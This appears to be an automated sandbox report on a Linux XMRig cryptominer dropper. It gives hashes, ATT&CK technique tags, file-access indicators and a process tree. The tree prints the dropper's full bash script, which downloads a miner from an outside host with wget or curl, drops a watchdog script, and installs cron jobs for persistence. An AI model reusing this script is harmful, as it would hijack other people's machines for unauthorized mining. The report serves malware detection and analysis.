xmrig | afd21d61ab393e3ee1512b07010756c8718be56ab9fe9b0359127f1e6e306509

General

Target

.main.elf
Size

918KB
MD5

4567d8c6fc031d7e6ec7e05d7bf0875b
SHA1

136ed52d890bc49b5dc2792d8b20511b88c24f9c
SHA256

afd21d61ab393e3ee1512b07010756c8718be56ab9fe9b0359127f1e6e306509
SHA512

90bb019e9ea322d2d4972bf043bdc2b798b3b5c5d8d42c0641072db64dce2bbfd3d34b7ff6bbefe0d3aabbb3dd54e15e5262dca3065d87f7299f321a173d7d97
SSDEEP

12288:qfbx0BUBiCIT+yaXkeG2eNBRvlqoQfGO26dyynbikoYAw:qfbx0xCIT+xXkeGNNB33QR8kB1

Score

10^/10

xmrig xmrig_linux antivm defense_evasion discovery execution miner persistence privilege_escalatio

Malware Config

Signatures

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
/var/tmp/.rcu_gp/.report_system	family_xmrig
/var/tmp/.rcu_gp/.report_system	xmrig

Xmrig family
xmrig
Xmrig_linux family
xmrig_linux
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

bashchmodchmod

pid process

1571 bash
1584 chmod
1586 chmod

pid	process
1571	bash
1584	chmod
1586	chmod

Executes dropped EXE 57 IoCs

Processes:

diicot.report_systemdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicot

ioc	pid	process
/var/tmp/.rcu_gp/diicot	1597	diicot
/var/tmp/.rcu_gp/.report_system	1599	.report_system
/var/tmp/.rcu_gp/diicot	1611	diicot
/var/tmp/.rcu_gp/diicot	1617	diicot
/var/tmp/.rcu_gp/diicot	1623	diicot
/var/tmp/.rcu_gp/diicot	1629	diicot
/var/tmp/.rcu_gp/diicot	1635	diicot
/var/tmp/.rcu_gp/diicot	1641	diicot
/var/tmp/.rcu_gp/diicot	1647	diicot
/var/tmp/.rcu_gp/diicot	1653	diicot
/var/tmp/.rcu_gp/diicot	1661	diicot
/var/tmp/.rcu_gp/diicot	1667	diicot
/var/tmp/.rcu_gp/diicot	1673	diicot
/var/tmp/.rcu_gp/diicot	1679	diicot
/var/tmp/.rcu_gp/diicot	1685	diicot
/var/tmp/.rcu_gp/diicot	1691	diicot
/var/tmp/.rcu_gp/diicot	1697	diicot
/var/tmp/.rcu_gp/diicot	1703	diicot
/var/tmp/.rcu_gp/diicot	1709	diicot
/var/tmp/.rcu_gp/diicot	1715	diicot
/var/tmp/.rcu_gp/diicot	1721	diicot
/var/tmp/.rcu_gp/diicot	1727	diicot
/var/tmp/.rcu_gp/diicot	1733	diicot
/var/tmp/.rcu_gp/diicot	1739	diicot
/var/tmp/.rcu_gp/diicot	1745	diicot
/var/tmp/.rcu_gp/diicot	1751	diicot
/var/tmp/.rcu_gp/diicot	1757	diicot
/var/tmp/.rcu_gp/diicot	1763	diicot
/var/tmp/.rcu_gp/diicot	1769	diicot
/var/tmp/.rcu_gp/diicot	1775	diicot
/var/tmp/.rcu_gp/diicot	1781	diicot
/var/tmp/.rcu_gp/diicot	1787	diicot
/var/tmp/.rcu_gp/diicot	1793	diicot
/var/tmp/.rcu_gp/diicot	1799	diicot
/var/tmp/.rcu_gp/diicot	1805	diicot
/var/tmp/.rcu_gp/diicot	1811	diicot
/var/tmp/.rcu_gp/diicot	1817	diicot
/var/tmp/.rcu_gp/diicot	1823	diicot
/var/tmp/.rcu_gp/diicot	1829	diicot
/var/tmp/.rcu_gp/diicot	1835	diicot
/var/tmp/.rcu_gp/diicot	1841	diicot
/var/tmp/.rcu_gp/diicot	1847	diicot
/var/tmp/.rcu_gp/diicot	1853	diicot
/var/tmp/.rcu_gp/diicot	1859	diicot
/var/tmp/.rcu_gp/diicot	1865	diicot
/var/tmp/.rcu_gp/diicot	1874	diicot
/var/tmp/.rcu_gp/diicot	1880	diicot
/var/tmp/.rcu_gp/diicot	1886	diicot
/var/tmp/.rcu_gp/diicot	1892	diicot
/var/tmp/.rcu_gp/diicot	1898	diicot
/var/tmp/.rcu_gp/diicot	1904	diicot
/var/tmp/.rcu_gp/diicot	1910	diicot
/var/tmp/.rcu_gp/diicot	1916	diicot
/var/tmp/.rcu_gp/diicot	1922	diicot
/var/tmp/.rcu_gp/diicot	1928	diicot
/var/tmp/.rcu_gp/diicot	1934	diicot
/var/tmp/.rcu_gp/diicot	1940	diicot

Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

Checks DMI information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

.report_system

description	ioc	process
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_name	.report_system

Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
execution persistence privilege_escalatio

Cron
T1053.003

Processes:

crontab

description ioc process

File opened for modification /var/spool/cron/crontabs/tmp.SkkxPy crontab
Enumerates running processes
Discovers information about currently running processes on the system

description	ioc	process
File opened for modification	/var/spool/cron/crontabs/tmp.SkkxPy	crontab

Reads hardware information 1 TTPs 14 IoCs

Accesses system info like serial numbers, manufacturer names etc.

discovery

System Information Discovery

T1082

Processes:

.report_system

description	ioc	process
File opened for reading	/sys/devices/virtual/dmi/id/board_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_name	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	.report_system

Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
antivm

System Checks
T1497.001

Processes:

.report_system

description ioc process

File opened for reading /proc/cpuinfo .report_system

description	ioc	process
File opened for reading	/proc/cpuinfo	.report_system

Reads CPU attributes 1 TTPs 64 IoCs

discovery

System Information Discovery

T1082

Processes:

.report_systempgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgrep

description	ioc	process
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/number_of_sets	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/base_frequency	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/possible	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/topology/physical_package_id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/level	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/size	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/topology/die_cpus	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/number_of_sets	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/topology/package_cpus	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cpu_capacity	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/level	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/level	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/type	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep

Enumerates kernel/hardware configuration 1 TTPs 24 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

Processes:

.report_system

description	ioc	process
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-1048576kB/nr_hugepages	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_bandwidth	.report_system
File opened for reading	/sys/fs/cgroup/cgroup.controllers	.report_system
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	.report_system
File opened for reading	/sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages	.report_system
File opened for reading	/sys/devices/system/node/online	.report_system
File opened for reading	/sys/devices/system/node/node0/meminfo	.report_system
File opened for reading	/sys/devices/system/node/node0/hugepages	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_latency	.report_system
File opened for reading	/sys/devices/virtual/dmi/id	.report_system
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages	.report_system
File opened for reading	/sys/fs/cgroup/cpuset.mems.effective	.report_system
File opened for reading	/sys/kernel/mm/hugepages	.report_system
File opened for reading	/sys/devices/system/node/node0/cpumap	.report_system
File opened for reading	/sys/devices/system/node/node0/access1/initiators	.report_system
File opened for reading	/sys/devices/system/cpu	.report_system
File opened for reading	/sys/bus/dax/devices	.report_system
File opened for reading	/sys/firmware/dmi/tables/DMI	.report_system
File opened for reading	/sys/fs/cgroup/cpuset.cpus.effective	.report_system
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_bandwidth	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_latency	.report_system
File opened for reading	/sys/firmware/dmi/tables/smbios_entry_point	.report_system

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

pgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgrep

description	ioc	process
File opened for reading	/proc/699/status	pgrep
File opened for reading	/proc/1166/cmdline	pgrep
File opened for reading	/proc/540/status	pgrep
File opened for reading	/proc/206/cmdline	pgrep
File opened for reading	/proc/95/cmdline	pgrep
File opened for reading	/proc/824/cmdline	pgrep
File opened for reading	/proc/1163/status	pgrep
File opened for reading	/proc/1107/status	pgrep
File opened for reading	/proc/1078/cmdline	pgrep
File opened for reading	/proc/99/status	pgrep
File opened for reading	/proc/1387/cmdline	pgrep
File opened for reading	/proc/89/status	pgrep
File opened for reading	/proc/95/status	pgrep
File opened for reading	/proc/1160/status	pgrep
File opened for reading	/proc/667/cmdline	pgrep
File opened for reading	/proc/86/status	pgrep
File opened for reading	/proc/1559/status	pgrep
File opened for reading	/proc/82/status	pgrep
File opened for reading	/proc/83/status	pgrep
File opened for reading	/proc/1246/status	pgrep
File opened for reading	/proc/86/cmdline	pgrep
File opened for reading	/proc/731/cmdline	pgrep
File opened for reading	/proc/1/cmdline	pgrep
File opened for reading	/proc/588/status	pgrep
File opened for reading	/proc/8/cmdline	pgrep
File opened for reading	/proc/162/status	pgrep
File opened for reading	/proc/1453/cmdline	pgrep
File opened for reading	/proc/1165/status	pgrep
File opened for reading	/proc/1113/status	pgrep
File opened for reading	/proc/1078/status	pgrep
File opened for reading	/proc/1177/status	pgrep
File opened for reading	/proc/79/cmdline	pgrep
File opened for reading	/proc/27/cmdline	pgrep
File opened for reading	/proc/657/cmdline	pgrep
File opened for reading	/proc/212/cmdline	pgrep
File opened for reading	/proc/10/status	pgrep
File opened for reading	/proc/5/cmdline	pgrep
File opened for reading	/proc/86/status	pgrep
File opened for reading	/proc/22/cmdline	pgrep
File opened for reading	/proc/102/status	pgrep
File opened for reading	/proc/1145/cmdline	pgrep
File opened for reading	/proc/19/status	pgrep
File opened for reading	/proc/208/cmdline	pgrep
File opened for reading	/proc/871/status	pgrep
File opened for reading	/proc/225/cmdline	pgrep
File opened for reading	/proc/1571/status	pgrep
File opened for reading	/proc/222/cmdline	pgrep
File opened for reading	/proc/22/status	pgrep
File opened for reading	/proc/83/cmdline	pgrep
File opened for reading	/proc/3/cmdline	pgrep
File opened for reading	/proc/11/cmdline	pgrep
File opened for reading	/proc/630/status	pgrep
File opened for reading	/proc/871/status	pgrep
File opened for reading	/proc/77/status	pgrep
File opened for reading	/proc/86/cmdline	pgrep
File opened for reading	/proc/1057/status	pgrep
File opened for reading	/proc/589/status	pgrep
File opened for reading	/proc/223/status	pgrep
File opened for reading	/proc/726/cmdline	pgrep
File opened for reading	/proc/2/status	pgrep
File opened for reading	/proc/1440/status	pgrep
File opened for reading	/proc/587/cmdline	pgrep
File opened for reading	/proc/376/status	pgrep
File opened for reading	/proc/8/cmdline	pgrep

/tmp/.main.elf
/tmp/.main.elf
1⤵
PID:1571

/bin/bash
/tmp/.main.elf -c "exec '/tmp/.main.elf' \"\$@\"" /tmp/.main.elf
1⤵
PID:1571

/tmp/.main.elf
/tmp/.main.elf
1⤵
PID:1571

/bin/bash
/tmp/.main.elf -c " #!/bin/bash RCU_GP_DIR=\"/var/tmp/.rcu_gp\" REPORT_SYSTEM_URL=\"http://xkobeimparatu.net/.puscarie/.report_system\" DIICOT_FILE=\"diicot\" setup_report_system() { if [ ! -d \"\$RCU_GP_DIR\" ]; then mkdir \"\$RCU_GP_DIR\" fi cd \"\$RCU_GP_DIR\" || exit if command -v wget &> /dev/null; then wget \"\$REPORT_SYSTEM_URL\" -O .report_system elif command -v curl &> /dev/null; then curl -o .report_system \"\$REPORT_SYSTEM_URL\" else echo \"Nu s-a gasit nici wget, nici curl\" exit 1 fi chmod +x .report_system cd - || exit } create_diicot_file() { DIICOT_PATH=\"\$RCU_GP_DIR/\$DIICOT_FILE\" cat <<EOL > \"\$DIICOT_PATH\" #!/bin/bash if ! pgrep -x .report_system >/dev/null; then /var/tmp/.rcu_gp/./.report_system> /dev/null 2>&1 & disown \$* else : fi EOL chmod +x \"\$DIICOT_PATH\" } setup_cron_jobs() { locatie=\"\$RCU_GP_DIR\" locatie2=\"\$PWD\" if [ ! -f \"\$locatie/.ps4\" ]; then echo \"\$locatie\" > \"\$locatie/.ps4\" fi if ! crontab -l | grep -q '.main'; then rm -rf \"\$locatie/.ps5\" echo \"@daily \$locatie/\$DIICOT_FILE\" >> \"\$locatie/.ps5\" sleep 1 echo \"@reboot \$locatie2/.main > /dev/null 2>&1 & disown\" >> \"\$locatie/.ps5\" sleep 1 echo \"@monthly \$locatie2/.main > /dev/null 2>&1 & disown\" >> \"\$locatie/.ps5\" sleep 1 crontab \"\$locatie/.ps5\" sleep 1 rm -rf \"\$locatie/.ps5\" fi } setup_report_system create_diicot_file setup_cron_jobs while : do \$(cat /var/tmp/.rcu_gp/.ps4)/diicot setup_cron_jobs sleep 2.5 done echo \"Merge bn mineru serifule\" " /tmp/.main.elf
1⤵
- File and Directory Permissions Modification
PID:1571

/usr/bin/mkdir
mkdir /var/tmp/.rcu_gp
2⤵
PID:1572

/usr/bin/wget
wget http://xkobeimparatu.net/.puscarie/.report_system -O .report_system
2⤵
PID:1573

/usr/bin/chmod
chmod +x .report_system
2⤵
- File and Directory Permissions Modification
PID:1584

/usr/bin/cat
cat
2⤵
PID:1585

/usr/bin/chmod
chmod +x /var/tmp/.rcu_gp/diicot
2⤵
- File and Directory Permissions Modification
PID:1586

/usr/bin/grep
grep -q .main
2⤵
PID:1588

/usr/bin/crontab
crontab -l
2⤵
PID:1587

/usr/bin/rm
rm -rf /var/tmp/.rcu_gp/.ps5
2⤵
PID:1589

/usr/bin/sleep
sleep 1
2⤵
PID:1590

/usr/bin/sleep
sleep 1
2⤵
PID:1591

/usr/bin/sleep
sleep 1
2⤵
PID:1592

/usr/bin/crontab
crontab /var/tmp/.rcu_gp/.ps5
2⤵
- Creates/modifies Cron job
PID:1593

/usr/bin/sleep
sleep 1
2⤵
PID:1594

/usr/bin/rm
rm -rf /var/tmp/.rcu_gp/.ps5
2⤵
PID:1595

/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
2⤵
PID:1596

/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
2⤵
- Executes dropped EXE
PID:1597

/usr/bin/pgrep
pgrep -x .report_system
3⤵
- Reads CPU attributes
PID:1598

/usr/bin/grep
grep -q .main
2⤵
PID:1601

/usr/bin/crontab
crontab -l
2⤵
PID:1600

/usr/bin/sleep
sleep 2.5
2⤵
PID:1602

/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
2⤵
PID:1610

/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
2⤵
- Executes dropped EXE
PID:1611

/usr/bin/pgrep
pgrep -x .report_system
3⤵
- Reads CPU attributes
- Reads runtime system information
PID:1612

/usr/bin/grep
grep -q .main
2⤵
PID:1614

/usr/bin/crontab
crontab -l
2⤵
PID:1613

/usr/bin/sleep
sleep 2.5
2⤵
PID:1615

/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
2⤵
PID:1616

/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
2⤵
- Executes dropped EXE
PID:1617

/usr/bin/pgrep
pgrep -x .report_system
3⤵
- Reads CPU attributes
- Reads runtime system information
PID:1618

/usr/bin/grep
grep -q .main
2⤵
PID:1620

/usr/bin/crontab
crontab -l
2⤵
PID:1619

/usr/bin/sleep
sleep 2.5
2⤵
PID:1621

/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
2⤵
PID:1622

/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
2⤵
- Executes dropped EXE
PID:1623

/usr/bin/pgrep
pgrep -x .report_system
3⤵
- Reads CPU attributes
- Reads runtime system information
PID:1624

/usr/bin/grep
grep -q .main
2⤵
PID:1626

/usr/bin/crontab
crontab -l
2⤵
PID:1625

/usr/bin/sleep
sleep 2.5
2⤵
PID:1627

/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
2⤵
PID:1628

/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
2⤵
- Executes dropped EXE
PID:1629

/usr/bin/pgrep
pgrep -x .report_system
3⤵
- Reads runtime system information
PID:1630

/usr/bin/grep
grep -q .main
2⤵
PID:1632

/usr/bin/crontab
crontab -l
2⤵
PID:1631

/usr/bin/sleep
sleep 2.5
2⤵
PID:1633

/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
2⤵
PID:1634

/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
2⤵
- Executes dropped EXE
PID:1635

/usr/bin/pgrep
pgrep -x .report_system
3⤵
- Reads CPU attributes
PID:1636

/usr/bin/grep
grep -q .main
2⤵
PID:1638

/usr/bin/crontab
crontab -l
2⤵
PID:1637

/usr/bin/sleep
sleep 2.5
2⤵
PID:1639

/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
2⤵
PID:1640

/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
2⤵
- Executes dropped EXE
PID:1641

/usr/bin/pgrep
pgrep -x .report_system
3⤵
- Reads runtime system information
PID:1642

/usr/bin/grep
grep -q .main
2⤵
PID:1644

/usr/bin/crontab
crontab -l
2⤵
PID:1643

/usr/bin/sleep
sleep 2.5
2⤵
PID:1645

/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
2⤵
PID:1646

/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
2⤵
- Executes dropped EXE
PID:1647

/usr/bin/pgrep
pgrep -x .report_system
3⤵
PID:1648

/usr/bin/grep
grep -q .main
2⤵
PID:1650

/usr/bin/crontab
crontab -l
2⤵
PID:1649

/usr/bin/sleep
sleep 2.5
2⤵
PID:1651

/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
2⤵
PID:1652

/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
2⤵
- Executes dropped EXE
PID:1653

/usr/bin/pgrep
pgrep -x .report_system
3⤵
PID:1654

/usr/bin/grep
grep -q .main
2⤵
PID:1656

/usr/bin/crontab
crontab -l
2⤵
PID:1655

/usr/bin/sleep
sleep 2.5
2⤵
PID:1657

/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
2⤵
PID:1660

/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
2⤵
- Executes dropped EXE
PID:1661

/usr/bin/pgrep
pgrep -x .report_system
3⤵
- Reads CPU attributes
- Reads runtime system information
PID:1662

/usr/bin/grep
grep -q .main
2⤵
PID:1664

/usr/bin/crontab
crontab -l
2⤵
PID:1663

/usr/bin/sleep
sleep 2.5
2⤵
PID:1665

/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
2⤵
PID:1666

/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
2⤵
- Executes dropped EXE
PID:1667

/usr/bin/pgrep
pgrep -x .report_system
3⤵
- Reads CPU attributes
PID:1668

/usr/bin/grep
grep -q .main
2⤵
PID:1670

/usr/bin/crontab
crontab -l
2⤵
PID:1669

/usr/bin/sleep
sleep 2.5
2⤵
PID:1671

/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
2⤵
PID:1672

/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
2⤵
- Executes dropped EXE
PID:1673

/usr/bin/pgrep
pgrep -x .report_system
3⤵
- Reads CPU attributes
- Reads runtime system information
PID:1674

/usr/bin/grep
grep -q .main
2⤵
PID:1676

/usr/bin/crontab
crontab -l
2⤵
PID:1675

/usr/bin/sleep
sleep 2.5
2⤵
PID:1677

/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
2⤵
PID:1678

/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
2⤵
- Executes dropped EXE
PID:1679

/usr/bin/pgrep
pgrep -x .report_system
3⤵
PID:1680

/usr/bin/grep
grep -q .main
2⤵
PID:1682

/usr/bin/crontab
crontab -l
2⤵
PID:1681

/usr/bin/sleep
sleep 2.5
2⤵
PID:1683

/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
2⤵
PID:1684

/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
2⤵
- Executes dropped EXE
PID:1685

/usr/bin/pgrep
pgrep -x .report_system
3⤵
- Reads CPU attributes
PID:1686

/usr/bin/grep
grep -q .main
2⤵
PID:1688

/usr/bin/crontab
crontab -l
2⤵
PID:1687

/usr/bin/sleep
sleep 2.5
2⤵
PID:1689

/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
2⤵
PID:1690

/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
2⤵
- Executes dropped EXE
PID:1691

/usr/bin/pgrep
pgrep -x .report_system
3⤵
- Reads runtime system information
PID:1692

/usr/bin/grep
grep -q .main
2⤵
PID:1694

/usr/bin/crontab
crontab -l
2⤵
PID:1693

/usr/bin/sleep
sleep 2.5
2⤵
PID:1695

/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
2⤵
PID:1696

/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
2⤵
- Executes dropped EXE
PID:1697

/usr/bin/pgrep
pgrep -x .report_system
3⤵
- Reads runtime system information
PID:1698

/usr/bin/grep
grep -q .main
2⤵
PID:1700

/usr/bin/crontab
crontab -l
2⤵
PID:1699

/usr/bin/sleep
sleep 2.5
2⤵
PID:1701

/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
2⤵
PID:1702

/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
2⤵
- Executes dropped EXE
PID:1703

/usr/bin/pgrep
pgrep -x .report_system
3⤵
PID:1704

/usr/bin/grep
grep -q .main
2⤵
PID:1706

/usr/bin/crontab
crontab -l
2⤵
PID:1705

/usr/bin/sleep
sleep 2.5
2⤵
PID:1707

/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
2⤵
PID:1708

/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
2⤵
- Executes dropped EXE
PID:1709

/usr/bin/pgrep
pgrep -x .report_system
3⤵
- Reads CPU attributes
- Reads runtime system information
PID:1710

/usr/bin/grep
grep -q .main
2⤵
PID:1712

/usr/bin/crontab
crontab -l
2⤵
PID:1711

/usr/bin/sleep
sleep 2.5
2⤵
PID:1713

/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
2⤵
PID:1714

/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
2⤵
- Executes dropped EXE
PID:1715

/usr/bin/pgrep
pgrep -x .report_system
3⤵
- Reads CPU attributes
- Reads runtime system information
PID:1716

/usr/bin/grep
grep -q .main
2⤵
PID:1718

/usr/bin/crontab
crontab -l
2⤵
PID:1717

/usr/bin/sleep
sleep 2.5
2⤵
PID:1719

/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
2⤵
PID:1720

/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
2⤵
- Executes dropped EXE
PID:1721

/usr/bin/pgrep
pgrep -x .report_system
3⤵
PID:1722

/usr/bin/grep
grep -q .main
2⤵
PID:1724

/usr/bin/crontab
crontab -l
2⤵
PID:1723

/usr/bin/sleep
sleep 2.5
2⤵
PID:1725

/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
2⤵
PID:1726

/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
2⤵
- Executes dropped EXE
PID:1727

/usr/bin/pgrep
pgrep -x .report_system
3⤵
- Reads CPU attributes
PID:1728

/usr/bin/grep
grep -q .main
2⤵
PID:1730

/usr/bin/crontab
crontab -l
2⤵
PID:1729

/usr/bin/sleep
sleep 2.5
2⤵
PID:1731

/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
2⤵
PID:1732

